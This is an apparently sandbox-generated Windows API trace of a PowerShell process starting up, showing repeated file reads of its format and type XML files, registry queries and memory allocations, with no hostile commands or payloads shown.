	[0525.076] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.076] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.077] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.077] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.077] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.079] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.080] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.080] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.080] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.081] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.081] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.081] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.082] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.082] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.082] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.083] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.083] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.083] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.083] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.084] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.084] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.087] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.087] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.088] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.088] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.088] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.088] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.088] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.089] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1000, lpOverlapped=0x0) returned 1
	[0525.089] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x1b4, lpOverlapped=0x0) returned 1
	[0525.089] ReadFile (in: hFile=0x2e8, lpBuffer=0x2d71a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d268, lpOverlapped=0x0 | out: lpBuffer=0x2d71a88*, lpNumberOfBytesRead=0x12d268*=0x0, lpOverlapped=0x0) returned 1
	[0525.089] CloseHandle (hObject=0x2e8) returned 1
	[0525.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0525.090] SetErrorMode (uMode=0x1) returned 0x1
	[0525.090] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d1e0 | out: lpFileInformation=0x12d1e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0525.090] SetErrorMode (uMode=0x1) returned 0x1
	[0525.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0525.090] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2c8 | out: phkResult=0x12d2c8*=0x2e8) returned 0x0
	[0525.090] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d24c, lpData=0x0, lpcbData=0x12d248*=0x0 | out: lpType=0x12d24c*=0x1, lpData=0x0, lpcbData=0x12d248*=0x56) returned 0x0
	[0525.090] CoTaskMemAlloc (cb=0x5a) returned 0x1b836ee0
	[0525.090] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d21c, lpData=0x1b836ee0, lpcbData=0x12d218*=0x56 | out: lpType=0x12d21c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d218*=0x56) returned 0x0
	[0525.090] CoTaskMemFree (pv=0x1b836ee0) 
	[0525.091] RegCloseKey (hKey=0x2e8) returned 0x0
	[0525.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0525.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0526.978] VirtualQuery (in: lpAddress=0x12bfb0, lpBuffer=0x12ce70, dwLength=0x30 | out: lpBuffer=0x12ce70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0527.811] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0527.811] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0527.812] CoTaskMemFree (pv=0x2c1dd0) 
	[0527.818] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d468 | out: phkResult=0x12d468*=0x2e8) returned 0x0
	[0527.818] RegQueryValueExW (in: hKey=0x2e8, lpValueName="path", lpReserved=0x0, lpType=0x12d47c, lpData=0x0, lpcbData=0x12d478*=0x0 | out: lpType=0x12d47c*=0x1, lpData=0x0, lpcbData=0x12d478*=0x74) returned 0x0
	[0527.818] RegQueryValueExW (in: hKey=0x2e8, lpValueName="path", lpReserved=0x0, lpType=0x12d3ec, lpData=0x0, lpcbData=0x12d3e8*=0x0 | out: lpType=0x12d3ec*=0x1, lpData=0x0, lpcbData=0x12d3e8*=0x74) returned 0x0
	[0527.818] CoTaskMemAlloc (cb=0x78) returned 0x2fe550
	[0527.818] RegQueryValueExW (in: hKey=0x2e8, lpValueName="path", lpReserved=0x0, lpType=0x12d3bc, lpData=0x2fe550, lpcbData=0x12d3b8*=0x74 | out: lpType=0x12d3bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x12d3b8*=0x74) returned 0x0
	[0527.818] CoTaskMemFree (pv=0x2fe550) 
	[0527.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x12d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0527.818] SetErrorMode (uMode=0x1) returned 0x1
	[0527.819] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x12d340 | out: lpFileInformation=0x12d340*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0527.819] SetErrorMode (uMode=0x1) returned 0x1
	[0527.820] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0527.820] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0527.820] CoTaskMemFree (pv=0x2c1dd0) 
	[0529.062] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0529.062] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0529.062] CoTaskMemFree (pv=0x2c1dd0) 
	[0529.064] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0529.064] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0529.064] CoTaskMemFree (pv=0x2c1dd0) 
	[0529.066] CoTaskMemAlloc (cb=0x104) returned 0x2c1dd0
	[0529.066] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1dd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0529.066] CoTaskMemFree (pv=0x2c1dd0) 
	[0529.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0529.067] SetErrorMode (uMode=0x1) returned 0x1
	[0529.067] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0529.068] GetFileType (hFile=0x308) returned 0x1
	[0529.068] SetErrorMode (uMode=0x1) returned 0x1
	[0529.068] GetFileType (hFile=0x308) returned 0x1
	[0529.068] ReadFile (in: hFile=0x308, lpBuffer=0x3419b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3419b80*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0529.070] ReadFile (in: hFile=0x308, lpBuffer=0x3419b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3419b80*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0529.071] ReadFile (in: hFile=0x308, lpBuffer=0x3419b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3419b80*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0529.071] ReadFile (in: hFile=0x308, lpBuffer=0x3419b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3419b80*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0529.071] ReadFile (in: hFile=0x308, lpBuffer=0x3419b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3419b80*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0529.072] ReadFile (in: hFile=0x308, lpBuffer=0x3419b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3419b80*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0529.072] ReadFile (in: hFile=0x308, lpBuffer=0x3419b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3419b80*, lpNumberOfBytesRead=0x12cfd8*=0x9e2, lpOverlapped=0x0) returned 1
	[0529.072] ReadFile (in: hFile=0x308, lpBuffer=0x34190ca, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x34190ca*, lpNumberOfBytesRead=0x12cfd8*=0x0, lpOverlapped=0x0) returned 1
	[0529.072] ReadFile (in: hFile=0x308, lpBuffer=0x3419b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3419b80*, lpNumberOfBytesRead=0x12cfd8*=0x0, lpOverlapped=0x0) returned 1
	[0529.072] CloseHandle (hObject=0x308) returned 1
	[0529.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0529.072] SetErrorMode (uMode=0x1) returned 0x1
	[0529.073] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12cf80 | out: lpFileInformation=0x12cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0529.073] SetErrorMode (uMode=0x1) returned 0x1
	[0529.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0529.073] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d068 | out: phkResult=0x12d068*=0x308) returned 0x0
	[0529.073] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cfec, lpData=0x0, lpcbData=0x12cfe8*=0x0 | out: lpType=0x12cfec*=0x1, lpData=0x0, lpcbData=0x12cfe8*=0x56) returned 0x0
	[0529.073] CoTaskMemAlloc (cb=0x5a) returned 0x1b836a10
	[0529.073] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cfbc, lpData=0x1b836a10, lpcbData=0x12cfb8*=0x56 | out: lpType=0x12cfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12cfb8*=0x56) returned 0x0
	[0529.073] CoTaskMemFree (pv=0x1b836a10) 
	[0529.073] RegCloseKey (hKey=0x308) returned 0x0
	[0529.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0529.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0529.083] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x40417a5c, Data2=0xe8bd, Data3=0x47e8, Data4=([0]=0x95, [1]=0xd9, [2]=0x26, [3]=0x2c, [4]=0x91, [5]=0xdc, [6]=0xd, [7]=0xc8))) returned 0x0
	[0529.093] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x7a09260e, Data2=0x1ae1, Data3=0x4361, Data4=([0]=0x9e, [1]=0xd6, [2]=0x3c, [3]=0x5, [4]=0xe9, [5]=0x1f, [6]=0x29, [7]=0x1d))) returned 0x0
	[0529.095] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0529.095] GetFileType (hFile=0x308) returned 0x1
	[0529.095] SetErrorMode (uMode=0x1) returned 0x1
	[0529.095] GetFileType (hFile=0x308) returned 0x1
	[0529.096] ReadFile (in: hFile=0x308, lpBuffer=0x34446e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x34446e8*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0529.097] ReadFile (in: hFile=0x308, lpBuffer=0x34446e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x34446e8*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0529.097] ReadFile (in: hFile=0x308, lpBuffer=0x34446e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x34446e8*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0529.097] ReadFile (in: hFile=0x308, lpBuffer=0x34446e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x34446e8*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0529.098] ReadFile (in: hFile=0x308, lpBuffer=0x34446e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x34446e8*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0529.098] ReadFile (in: hFile=0x308, lpBuffer=0x34446e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x34446e8*, lpNumberOfBytesRead=0x12cfd8*=0xfb2, lpOverlapped=0x0) returned 1
	[0529.099] ReadFile (in: hFile=0x308, lpBuffer=0x3443e02, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3443e02*, lpNumberOfBytesRead=0x12cfd8*=0x0, lpOverlapped=0x0) returned 1
	[0529.099] ReadFile (in: hFile=0x308, lpBuffer=0x34446e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x34446e8*, lpNumberOfBytesRead=0x12cfd8*=0x0, lpOverlapped=0x0) returned 1
	[0529.099] CloseHandle (hObject=0x308) returned 1
	[0529.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0529.099] SetErrorMode (uMode=0x1) returned 0x1
	[0529.099] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12cf80 | out: lpFileInformation=0x12cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0529.099] SetErrorMode (uMode=0x1) returned 0x1
	[0529.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0529.100] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d068 | out: phkResult=0x12d068*=0x308) returned 0x0
	[0529.100] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cfec, lpData=0x0, lpcbData=0x12cfe8*=0x0 | out: lpType=0x12cfec*=0x1, lpData=0x0, lpcbData=0x12cfe8*=0x56) returned 0x0
	[0529.100] CoTaskMemAlloc (cb=0x5a) returned 0x1b836fc0
